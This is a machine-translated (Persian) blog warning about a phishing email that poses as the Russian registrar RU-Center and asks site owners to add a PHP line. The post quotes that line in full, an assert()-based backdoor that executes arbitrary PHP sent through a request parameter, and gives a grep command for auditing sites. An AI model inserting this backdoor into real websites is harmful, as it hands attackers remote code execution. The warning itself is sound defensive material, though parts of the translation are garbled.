توجه به "مدیران وب" که PHP نمی دانند. آسیب پذیری
این ترجمه اتوماتیک است.
برای خواندن نشریه به زبان اصلی اینجا را کلیک کنید.
امروز برخی از دوستان من نامه هایی دریافت کردند ، ظاهراً از RU -Center (بزرگترین ثبت کننده نام دامنه روسی) - nic.ru ، با محتوای زیر:
نامه ها از info@nic.technical ارسال شده است. در نامه ، مهاجمان که خود را به نمایندگی از مرکز RU معرفی می کنند ، پیشنهاد می کنند کد زیر را در وب سایت قرار دهید:
<?php assert(stripslashes($_REQUEST[RUCENTER])); ?>متأسفانه ، بسیاری از همکاران ما ، که خود را "مدیران وب" (صاحبان سایت های متعدد) می نامند ، PHP نمی دانند و به خطرات کد بالا فکر نمی کنند. اگر رشته ای را به عنوان پارامتر به این تابع منتقل کنید ، با () assert به عنوان کد PHP در نظر گرفته می شود! مراقب باش!
من توصیه می کنم که پروژه های php خود را برای آسیب پذیری با استفاده از دستورات assert یا eval بازرسی کنید. اگر این دستورات در کد پروژه وجود دارد ، نگران نباشید - الگوریتم آنها را مطالعه کنید. استفاده مجاز از الگوریتم ها کاملاً امکان پذیر است. در مورد مثال بالا، دستور اجازه خواهد داد که حمله به پاسخ سایت خود، به عنوان مثال، با استفاده از پارامتر RUCENTER - به http://sistema-audit.ru/؟RUCENTER=PHP-code
توصیه می کنیم با استفاده از مثال لینوکس grep -i -r 'assert' / home / www / mysite / * که پوشه ای با فایل های سایت را نشان می دهد ، جستجو کنید تا لیستی از پرونده هایی که مشکوک در آنها وجود دارد را دریافت کنید. نمونه از کد استفاده می شود.
مراقب خود و سایت های خود باشید!
این ترجمه اتوماتیک است.
برای خواندن نشریه به زبان اصلی اینجا را کلیک کنید.
Kommentarer (0)